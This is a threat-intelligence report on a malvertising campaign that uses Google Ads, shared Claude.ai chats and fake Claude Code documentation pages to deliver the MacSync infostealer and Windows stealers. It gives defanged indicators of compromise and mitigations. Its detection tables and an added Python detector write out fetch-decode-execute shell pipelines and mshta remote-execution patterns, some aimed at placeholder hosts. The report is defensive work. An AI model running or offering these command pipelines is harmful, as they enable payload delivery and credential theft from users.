Fake Claude Code Install Guide Hides MacSync Infostealer in Active Google Ads Campaign
| Group | Attribution unconfirmed; compromised Malaysian company's Google Ads account used as delivery infrastructure proxy |
| Type | Malvertising / ClickFix Infostealer Campaign — cross-platform macOS and Windows |
| Malware | MacSync — macOS Malware as a Service infostealer targeting browser credentials, Keychain databases, session cookies, and cryptocurrency wallets; Trojan.Stealer.GJ / Trojan.Stealer.GK — Windows credential stealers delivered via mshta.exe; Mach-O reverse shell (second macOS campaign cluster) |
| Score | 🟠 8.5 High. Active cross-platform campaign with 15,600+ confirmed victims, novel abuse of legitimate AI shared chat infrastructure as malware hosting, polymorphic delivery resisting hash-based detection, and ongoing credential exfiltration at scale. |
| Observed | May 2026, BleepingComputer, Bitdefender, Trend Micro, Anvilogic, Malwarebytes |
Overview
An active malvertising campaign discovered on 11 May 2026 is weaponising Google Ads and legitimate Claude.ai shared chats to deliver the MacSync infostealer to macOS users, with a parallel Windows attack chain distributing credential-stealing trojans through fake Claude Code documentation pages. Security researcher Berk Albayrak of Trendyol Group flagged the first attack cluster; BleepingComputer independently confirmed a second cluster operating on entirely separate infrastructure and running the same technique.
The campaign exploits a trust gap created by AI platforms that allow public content sharing. The malicious installation instructions are hosted on claude.ai itself, so there is no fake URL for security-aware users to detect, no lookalike domain, and no certificate warning. After clicking what appears to be a valid Google Ad pointing to the real claude.ai domain, victims land on a legitimate claude.ai shared chat attributed to "Apple Support" that presents itself as an official Claude Code installation guide for Mac.
MacSync operates as a Malware as a Service platform leased to multiple threat actors. The variant deployed in this campaign harvests browser saved credentials, cookies, macOS Keychain contents, and cryptocurrency wallet seed phrases, packages the collected data as /tmp/osalogging.zip, and exfiltrates the bundle via HTTP POST to the operator's command-and-control gate endpoint. A polymorphic server generates a uniquely obfuscated payload on every request, limiting the reliability of signature and hash-based detection across both EDR and antivirus tooling.
Bitdefender confirms a Windows-specific attack vector running in parallel, where a Squarespace-hosted page mirrors the official Claude Code documentation layout and uses the same ClickFix social engineering technique to execute a remotely hosted HTA file via mshta.exe. The Windows payloads are detected by Bitdefender as Trojan.Stealer.GJ, Trojan.Stealer.GK, IL:Trojan.MSILZilla.245316, and Gen:Variant.Barys.509034. More than 15,600 victims have been documented publicly across both campaigns as of 11 May 2026.
Key Details
Delivery Method – Google Ads malvertising combined with ClickFix social engineering via legitimate Claude.ai shared chats on macOS, and Squarespace-hosted fake Claude Code documentation pages on Windows
Target – macOS users searching for Claude or Claude Code downloads; Windows users visiting fake Claude Code documentation sites; broad cross-platform targeting with no specific industry vertical; Russian and CIS-region keyboard locales are excluded via locale check, suggesting the threat actors are deliberately avoiding that geographic region
Functions
- Harvests browser saved credentials and autofill data across all major browsers
- Extracts macOS Keychain databases containing stored passwords, certificates, and secure notes
- Steals cryptocurrency wallet seed phrases and private key material
- Captures live session cookies, enabling account takeover without requiring password re-entry
- Delivers locale-aware payload that silently exits on machines configured with a Russian or CIS-region keyboard layout
- Second macOS variant delivers a Mach-O reverse shell providing interactive terminal access via /bin/bash or /bin/zsh
- Packages exfiltrated data as /tmp/osalogging.zip and HTTP POSTs to the attacker C2 gate
Obfuscation – Base64-encoded Terminal commands conceal the true payload download URL from casual inspection; server-side polymorphic delivery generates a uniquely obfuscated payload variant per request; fileless execution via in-memory script pipeline (curl piped to base64 decode piped to osascript) leaves no persistent executable written to disk
Attack Vectors
Stage 1 — Ad Placement: Attackers purchase Google Ads targeting search queries including "Claude mac download" and "download claude code". The ads display claude.ai as the destination URL and appear legitimate in both the ad label and the browser address bar following redirect. The advertiser identity used to place the ads belongs to a real Malaysian company whose Google Ads account was compromised by the threat actors and used as a proxy for ad placement; the account has since been deactivated by Google.
Stage 2 — Lure Delivery: Victims arrive at a publicly shared Claude.ai chat that presents itself as an official "Claude Code on Mac" installation guide attributed to "Apple Support" within the chat interface. The chat walks users through opening Terminal and pasting a command. Because the content is hosted on claude.ai, there are no domain anomalies, no TLS certificate warnings, and no indicators that trained users would act on through standard URL verification. A parallel Windows vector directs victims to a Squarespace-hosted page that duplicates the layout, navigation structure, and styling of the official Claude Code documentation site.
Stage 3 — ClickFix Execution: The Terminal command is base64-encoded to conceal the payload download URL. Execution pulls a loader shell script from attacker-controlled infrastructure and runs it in memory. The script first profiles the victim system, collects external IP address, hostname, OS version, and keyboard locale, then silently aborts on Russian or CIS-region keyboard configurations. On Windows, the ClickFix instruction abuses mshta.exe — a legitimate Microsoft HTML Application host binary — to fetch and execute a remotely hosted HTA file, which in turn downloads secondary stealer payloads and invokes PowerShell to modify Windows Defender settings.
Stage 4 — Payload Execution and Exfiltration: The macOS loader pulls a second-stage payload and executes it through osascript, macOS's built-in command-line runner for AppleScript. MacSync runs entirely in memory, sweeps Keychain databases, browser credential stores, cookies, and cryptocurrency wallet files, then packages the data as /tmp/osalogging.zip and exfiltrates it via HTTP POST to a2abotnet[.]com/gate. A second macOS variant delivers a Mach-O (Mach object) binary reverse shell, giving the operator interactive command execution on the compromised machine. The Windows stealer components perform equivalent credential harvesting from Windows Credential Manager and browser stores before exfiltrating to claude-code.official-version[.]com.
Known Indicators of Compromise
Indicators may vary across campaigns and malware samples. Verify all IOCs against current threat feeds before actioning.
File Hashes
| Indicator | Type | Notes |
|---|---|---|
| bbd98170ea66c8d13605cb88ad0e18602ef40c0745f7b2c979a8a342a31c1857 | SHA-256 | Primary macOS MacSync payload — confirmed by BleepingComputer and Anvilogic |
C2 Domains and Exfiltration Infrastructure
| Indicator | Type | Associated Use |
|---|---|---|
| a2abotnet[.]com | C2 Domain | macOS MacSync command-and-control |
| a2abotnet[.]com/gate | Exfiltration Endpoint | HTTP POST destination for archived stolen credential bundle |
| claude-code.official-version[.]com | C2 Domain | Windows stealer command-and-control |
| customroofingcontractors[.]com | Payload Delivery Domain | Malicious loader and payload hosting |
| briskinternet[.]com | Infrastructure Domain | Second confirmed campaign cluster |
File Artefacts
| Indicator | Type | Notes |
|---|---|---|
| /tmp/osalogging.zip | Staged Exfiltration Archive | Data staging archive created prior to HTTP POST exfiltration |
Windows Process Chain Indicators
| Indicator | Type | Notes |
|---|---|---|
| Code.exe → powershell.exe → mshta.exe [remote URL] | Suspicious Process Chain | Windows attack chain execution signature |
macOS Behavioural Indicators
| Indicator | Type | Notes |
|---|---|---|
| curl \| base64 -d \| osascript | Shell Command Pattern | Fileless MacSync execution chain in Terminal |
| osascript spawned following curl or base64 decode | Process Behaviour | MacSync stage-two payload execution signature |
| curl \| base64 -d \| gunzip | Shell Command Pattern | Alternate delivery variant observed in campaign |
MITRE ATT&CK Techniques
| Technique ID | Technique Name | Application in This Campaign |
|---|---|---|
| T1566.002 | Phishing via Spearphishing Link | Google Ads redirect victims to malicious Claude.ai shared chats and Squarespace fake documentation pages |
| T1059.002 | Command and Scripting Interpreter: AppleScript | osascript executes the second-stage MacSync payload in memory on macOS |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Windows attack chain invokes PowerShell to modify Defender settings and download stealer payloads |
| T1218.005 | System Binary Proxy Execution: Mshta | mshta.exe fetches and executes a remotely hosted HTA file on Windows, bypassing application allow-list controls |
| T1140 | Deobfuscate/Decode Files or Information | Base64 encoding conceals the payload download URL inside the Terminal command shown to macOS victims |
| T1555.001 | Credentials from Password Stores: Keychain | MacSync targets macOS Keychain databases to extract all stored credentials |
| T1555.003 | Credentials from Web Browsers | Browser saved passwords, autofill entries, and live session cookies are harvested across all major browsers |
| T1041 | Exfiltration over C2 Channel | Credential archive POSTed to hxxp://a2abotnet[.]com/gate via HTTP |
Mitigation and Prevention
Block Confirmed Campaign Domains at the Perimeter
Add a2abotnet[.]com, claude-code.official-version[.]com, customroofingcontractors[.]com, and briskinternet[.]com to DNS blocklists and web proxy deny lists immediately. Monitoring for outbound HTTP POST connections to a2abotnet[.]com/gate is particularly high priority, as this is the active exfiltration endpoint and any connection to it indicates an already-compromised host.
Restrict mshta.exe from Executing Remote Content on Windows
The Windows attack chain depends on mshta.exe being permitted to fetch and run remotely hosted HTA content. Block this behaviour via AppLocker or Windows Defender Application Control policies. Where mshta.exe has no legitimate operational use in your environment, consider blocking the binary entirely rather than restricting its network access alone.
Deploy Behavioural Detection for macOS Fileless Execution
MacSync produces no persistent on-disk executable and uses server-side polymorphic payload generation to defeat hash-based signatures. EDR rules should alert on the osascript process being spawned as a child of shell processes that have executed curl or base64 decode operations. Monitor specifically for curl | base64 -d | osascript and curl | base64 -d | gunzip command patterns in Terminal and iTerm2.
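As an added illustration (not code from the original report or from any of the cited vendors), the following Python sketch applies the three behavioural indicators listed above, the macOS curl/base64 pipelines, osascript spawned beneath a shell that ran curl, and the Code.exe → powershell.exe → mshta.exe remote-URL chain, to constructed process events. The event field names, rule names and the .invalid hosts are assumptions.

```python
import re
from collections import namedtuple

# Constructed process-event shape modelled on this report's indicators; the field names are an
# assumption, real EDR telemetry (Sysmon, Endpoint Security, osquery) names them differently.
ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

# Matches both observed one-liners: curl | base64 -d | osascript  and  curl | base64 -d | gunzip
MACOS_PIPELINE = re.compile(r"\bcurl\b.*\|\s*base64\s+(?:-d|--decode)\b.*\|\s*(?:osascript|gunzip)\b")
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
SHELLS = {"sh", "bash", "zsh"}

def ancestors(ev, by_pid, depth=4):
    """Walk the parent chain up to `depth` hops; nearest parent first."""
    chain, cur = [], ev
    for _ in range(depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            break
        chain.append(cur)
    return chain

def detect(events):
    """Return [(pid, rule_name)] for events matching the campaign's behavioural indicators."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        parents = ancestors(ev, by_pid)
        if MACOS_PIPELINE.search(ev.cmdline):
            # Rule 1: the fileless one-liner itself, as pasted into Terminal or iTerm2.
            hits.append((ev.pid, "macos_curl_base64_pipeline"))
        elif ev.image == "osascript" and any(
                p.image in SHELLS and ("curl" in p.cmdline or "base64" in p.cmdline) for p in parents):
            # Rule 2: osascript spawned beneath a shell that ran curl or a base64 decode.
            hits.append((ev.pid, "macos_osascript_after_curl"))
        elif ev.image.lower() == "mshta.exe" and REMOTE_URL.search(ev.cmdline):
            # Rule 3: Code.exe -> powershell.exe -> mshta.exe <remote URL>; local HTA paths are ignored.
            if {"powershell.exe", "code.exe"} <= {p.image.lower() for p in parents}:
                hits.append((ev.pid, "windows_code_powershell_mshta_remote"))
    return hits

# Constructed sample telemetry; the .invalid hosts are placeholders, not campaign infrastructure.
SAMPLE_EVENTS = [
    ProcEvent(101, 100, "zsh", "zsh -c 'curl -fsSL http://payload.invalid/a | base64 -d | osascript'"),
    ProcEvent(102, 101, "osascript", "osascript"),
    ProcEvent(104, 100, "bash", "bash -c 'curl -fsSL http://payload.invalid/b | base64 -d | gunzip'"),
    ProcEvent(200, 1, "Code.exe", "Code.exe"),
    ProcEvent(201, 200, "powershell.exe", "powershell.exe"),
    ProcEvent(202, 201, "mshta.exe", "mshta.exe http://docs.invalid/setup.hta"),
    ProcEvent(203, 201, "mshta.exe", "mshta.exe C:\\Temp\\local.hta"),
]
```

Real telemetry usually records the pipeline only on the parent shell's command line while osascript itself logs an empty one, which is why the second rule walks the process ancestry instead of inspecting osascript alone.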
Treat Any Non-Official Claude Installation as a Compromise Indicator
No legitimate Claude or Claude Code installation flow instructs users to paste a Terminal command obtained from a Google search result, a shared chat, or any documentation page other than docs.anthropic.com. Any user in your environment who installed Claude software from a non-official source in the past 30 days should be assessed as a potential MacSync infection and their credentials treated as compromised.
Rotate Credentials and Audit Keychain Access on Affected Machines
For any user assessed as potentially exposed, rotate all browser-stored credentials, revoke live session tokens for corporate SaaS applications and email, and audit macOS Keychain contents for signs of unauthorised access. Cryptocurrency wallet seed phrases should be treated as fully compromised and wallet migration considered. Session cookie theft from this campaign enables account access without passwords, meaning password resets alone are insufficient without also invalidating active sessions.
Update Security Awareness Training for AI Platform Trust
Train users and helpdesk staff that a URL pointing to a legitimate AI platform such as claude.ai or chatgpt.com does not guarantee the safety of the content hosted at that URL. Shared content features on AI platforms are user-generated and unmoderated for malware intent. Legitimate software documentation never requires copying and pasting Terminal commands from a shared AI chat.
Audit Google Ads Account Access Across the Organisation
This campaign used a compromised legitimate advertiser's Google Ads account to place malicious ads that appeared credible to both users and Google's ad review systems. Review MFA status and access controls on any Google Ads accounts held by the organisation, and set up alerts for unusual ad creation or billing activity. Compromised advertiser accounts are increasingly used as trusted launch pads for malvertising because they pass baseline platform legitimacy checks.
Risk Assessment
The abuse of legitimate AI shared content features as malware staging infrastructure is a direct evolution of the ClickFix technique, and it removes most of the detection signals that security awareness training teaches users to look for. Prior ClickFix campaigns relied on lookalike domains, compromised websites, or fake documentation pages that forensically minded users could sometimes identify. Hosting malicious instructions inside a genuine claude.ai shared chat collapses that detection layer entirely. The combination of a valid Google Ad, a valid claude.ai URL, and a plausible Apple Support attribution inside the shared chat presents a threat model that most enterprise users and many security professionals would not flag as suspicious without specific knowledge of this campaign.
The 15,600+ victim count, confirmed across only two independently identified campaign clusters, almost certainly represents a fraction of actual infections. MacSync is a leased MaaS platform available to multiple threat actors, and the two infrastructure clusters observed operating this technique are likely not the only groups using it. The locale exclusion of Russian and CIS-region keyboard configurations is a consistent pattern seen in financially motivated Eastern European threat actors who use it to avoid compromising domestic users and drawing attention from local law enforcement, though formal attribution remains unconfirmed.
Exfiltrated Keychain and browser session data represents severe downstream risk in corporate environments. Harvested session cookies bypass MFA on applications that do not implement short token expiry or device-binding. A single compromised developer machine with cloud provider credentials in the browser or Keychain can expose broader infrastructure. The reverse shell variant observed in the second campaign cluster escalates the threat from credential theft to full persistent access, potentially transforming a single endpoint infection into a network intrusion.
Conclusion
Any macOS or Windows user who searched for Claude or Claude Code in the past two weeks and followed Terminal or command-line instructions from a Google search result or a shared chat should be assessed as potentially compromised and their credentials rotated across all browser-stored accounts immediately. Standard URL verification provides no protection in this campaign because attackers used the real claude.ai domain for payload delivery.
This campaign marks a clear signal that AI platform shared content features are now being incorporated into malware delivery infrastructure as trusted staging layers. The same technique is applicable to any AI platform with publicly shareable chat or artefact URLs, and defenders should expect it to be replicated against other platforms and with different malware payloads in the coming weeks.